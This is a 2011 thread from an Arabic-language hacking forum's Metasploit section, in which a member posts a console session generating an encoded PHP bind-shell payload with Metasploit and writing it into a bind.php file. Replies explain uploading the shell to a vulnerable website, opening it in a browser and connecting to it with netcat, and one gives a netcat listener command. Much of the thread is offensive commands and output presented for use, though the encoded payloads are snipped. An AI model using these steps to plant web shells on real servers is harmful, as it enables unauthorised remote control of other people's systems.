التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-12-2011, 09:15 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي Metasploit PHP Shell



HI EVERYONE
LIKE THE TITLE SAD

كود:



                                  _

                                 | |      o

 _  _  _    _ _|_  __,   ,    _  | |  __    _|_

/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |

  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/

                           /|

                           \|





       =[  Metasploit  v3.5.2-beta [core:3.5 api:1.0]

+ -- --=[ 644 exploits - 328 auxiliary

+ -- --=[ 216 payloads - 27 encoders - 8 nops

       =[ svn r11722 updated 4 days ago (2011.02.08)



msf > search php
[*] Searching loaded modules for pattern 'php'...

<--BIG SNIP-->

NOP Generators

==============



   Name         Disclosure Date  Rank    Description

   ----         ---------------  ----    -----------

   php/generic                   normal  PHP Nop Generator





Payloads

========



   Name                         Disclosure Date  Rank    Description

   ----                         ---------------  ----    -----------

   php/bind_perl                                 normal  PHP Command Shell, Bind TCP (via perl)

   php/bind_php                                  normal  PHP Command Shell, Bind TCP (via php)

   php/download_exec                             normal  PHP Executable Download and Execute

   php/exec                                      normal  PHP Execute Command 

   php/meterpreter/bind_tcp                      normal  PHP Meterpreter, Bind TCP Stager

   php/meterpreter/reverse_tcp                   normal  PHP Meterpreter, PHP Reverse TCP stager

   php/meterpreter_reverse_tcp                   normal  PHP Meterpreter, Reverse TCP Inline

   php/reverse_perl                              normal  PHP Command, Double reverse TCP connection (via perl)

   php/reverse_php                               normal  PHP Command Shell, Reverse TCP (via php)

   php/shell_findsock                            normal  PHP Command Shell, Find Sock



msf > use php/bind_php

msf payload(bind_php) > show options



Module options (payload/php/bind_php):



   Name   Current Setting  Required  Description

   ----   ---------------  --------  -----------

   LPORT  4444             yes       The listen port

   RHOST                   no        The target address



msf payload(bind_php) > set RHOST 192.168.1.5

RHOST => 192.168.1.5

msf payload(bind_php) > set LPORT 4321

LPORT => 4321

msf payload(bind_php) > generate -h

Usage: generate [options]



Generates a payload.



OPTIONS:



    -E        Force encoding.

    -b <opt>  The list of characters to avoid: '\x00\xff'

    -e <opt>  The name of the encoder module to use.

    -f <opt>  The output file name (otherwise stdout)

    -h        Help banner.

    -i <opt>  the number of encoding iterations.

    -k        Keep the template executable functional

    -o <opt>  A comma separated list of options in VAR=VAL format.

    -p <opt>  The Platform for output.

    -s <opt>  NOP sled length.

    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war

    -x <opt>  The executable template to use



msf payload(bind_php) > generate -t raw -e php/base64

eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

msf payload(bind_php) > exit



root@pentest101-desktop:/var/www# echo '<?php eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK)); ?>' > bind.php



#pentest101.blogspot.com
كود:
http://pastebin.com/5G1sH1x9



Metasploit PHP Shell

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 02-12-2011, 09:23 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

افتراضي


مشكوووووووووووووور

   

رد مع اقتباس
قديم 02-12-2011, 09:24 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
anti-trust
Your Worst Enemy
 
الصورة الرمزية anti-trust
 

 

 
إحصائية العضو






anti-trust غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
anti-trust is on a distinguished road

افتراضي


heheheheheh

Rock 'N Roll Baby

Don't Bother Me Right Now Coz am in Love



   

رد مع اقتباس
قديم 02-12-2011, 09:29 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية hitman-zone
 

 

 
إحصائية العضو





hitman-zone غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hitman-zone is on a distinguished road

افتراضي


nice reverse bro watch your pwn machine and make more skills boxpwning

   

رد مع اقتباس
قديم 02-12-2011, 09:38 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


trust
you cheating on me
?

Don't Bother Me Right Now Coz am in Love

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 02-12-2011, 09:42 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية hitman-zone
 

 

 
إحصائية العضو





hitman-zone غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hitman-zone is on a distinguished road

افتراضي


hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

   

رد مع اقتباس
قديم 02-12-2011, 09:45 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


by the way thx guys
HaVe Fun

التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 02-12-2011, 09:53 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


مشكور اخي داتا هااك لكن امممم هل تقصد بهذه الطريقه [ اصنع شل بلغة php ] طبعا الشل يكون من مشروع الميتاسبولت.. طيب هل الشل لما احفظه بإسم .bind.php هل أرفعه الى اي موقع مصاب بثغرة مثلا او ارفعه الى اي موقع واستعرضه من خلال المتصفح؟؟؟ ويظهر معاي هذا الشل ان شاء الله يكون هيك قصدك :d . واسف على السوال.



تحياتي لك. ياغالي.

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 02-12-2011, 09:59 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية data$hack
 

 

 
إحصائية العضو







data$hack غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
data$hack is on a distinguished road

افتراضي


نعم اخي ترفع الشل و تستعرضه من المتصفح
ثم تتوجه الى الnc

nc ip port
ip : server ip
port : listening port
التوقيع


data$hack : EIP HUNTER


Ninja-security team
http://Pentest101.blogspot.com

 

   

رد مع اقتباس
قديم 02-12-2011, 10:13 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية c--1
 

 

 
إحصائية العضو







c--1 غير متواجد حالياً

إرسال رسالة عبر MSN إلى c--1 إرسال رسالة عبر Skype إلى c--1

 

 

إحصائية الترشيح

عدد النقاط : 10
c--1 is on a distinguished road

افتراضي


لمم افهم ولو كلمة وحدة في الموضوع

   

رد مع اقتباس
قديم 02-12-2011, 10:51 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية hitman-zone
 

 

 
إحصائية العضو





hitman-zone غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hitman-zone is on a distinguished road

افتراضي


nc -l -v ip -p (port)
ex: nc -l -v 192.168.56.101 -p 4444

   

رد مع اقتباس
قديم 02-13-2011, 05:51 AM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية dr.deep
 

 

 
إحصائية العضو







dr.deep غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dr.deep is on a distinguished road

افتراضي


مشـ،،،كــ،،ـور ومــا تقــصر

التوقيع

أن لم تـــكن ذئب فالذئـــاب ستأكلك حــتما

 

   

رد مع اقتباس
قديم 02-13-2011, 11:07 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية Cyber Code
 

 

 
إحصائية العضو








Cyber Code غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Cyber Code is on a distinguished road

افتراضي


thanks data$hack keep it up

اقتباس
<? eval(base64_decode(C9QkJfQoJCQlAc29ja2V0X2Nsb3NlKC RzKTsKCQl9Cg));?>

اقتباس
مشكور اخي داتا هااك لكن امممم هل تقصد بهذه الطريقه [ اصنع شل بلغة php ] طبعا الشل يكون من مشروع الميتاسبولت.. طيب هل الشل لما احفظه بإسم .bind.php هل أرفعه الى اي موقع مصاب بثغرة مثلا او ارفعه الى اي موقع واستعرضه من خلال المتصفح؟؟؟ ويظهر معاي هذا الشل ان شاء الله يكون هيك قصدك :d . واسف على السوال.



تحياتي لك. ياغالي.

هذي وحده من طرق الأتصال في السرفر (عكسي أو مباشر) عبر النت كت في استخدام شل الميتا سبلويت .

والأستغلال مثل ماوضحو لك الشباب فوق , المهم عند كتابة الكود ضعه بين الأشارتين
كود:
<?
code
?>
في أمان الله
التوقيع

if i gain something from being a hacker
it would be a background of almost every beautiful dream

and if you asked me what did you gain from being a member here

i'll honestly answer , it's a brothers for life


سبحان الله العظيم , سبحان الله وبحمده
استغفر الله العلي العظيم وأتوب إليه

 

   

رد مع اقتباس
قديم 02-25-2011, 09:08 AM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية £Y@$s!n
 

 

 
إحصائية العضو






£Y@$s!n غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
£Y@$s!n is on a distinguished road

افتراضي


بارك الله فيك

التوقيع

,'~> لا اله الا الله محمد رسول الله <~',



My 3Ma
!L "ViruS.NoiR@HoTMaiL.CoM"



لـست أفضل من غيري لكني أملك قناعة قوية تجعلنـي أرفض مقارنة نفسي بـأحـد '

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 08:43 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0